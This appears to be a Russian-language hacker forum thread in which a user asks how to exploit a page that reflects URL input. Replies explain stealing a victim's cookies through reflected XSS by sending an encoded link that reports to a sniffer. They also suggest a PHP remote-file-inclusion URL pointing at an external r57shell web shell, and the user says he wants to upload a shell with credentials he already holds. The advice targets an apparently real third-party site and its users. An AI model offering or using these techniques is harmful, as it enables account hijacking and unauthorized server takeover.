Вот нашёл страничку где я могу писать что хочу в адресной строке и это выводится на странице. Подскажите чтоб такого я мог бы сделать? Cкрин Думаю фильтра на знаки там нет
пассивная хсс...если там авторизация есть, максимум что сможешь, это: подставишь в урл скрипт, отсылающий куки на снифер, закодируешь урл, дашь жертве урл, чтоб он зашел по этой ссылке...куки будут на снифере.
А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?
авторизация есть, но у меня уже есть usernameassword я просто в пхп нифига не понимаю если есть было бы хорошо визуальный шелл туда загрузить
Ты сночала подумай точно это инклуд! Инклуд это не <Iframe src=[shell]> От Модера: рЫклама запрещается, причем там надо зарегистрироваться.Лучше ,ы скопировал сюда, а внизу поставил бы (це) нетсек поверед бай машка =)
я сходил по этой ссылке: PHP-including и попробовал, только у меня не получается ковычки вставить для include src если я ковычки печатаю то всё что находится между ними появляется на странице даже если использую ` или ' получается только если я вставляю какой нибудь таг в ковычкaх, к примеру здесь первое слово не появляется, а второе появляется <? echo "Whatever <br> Whenever" ?>
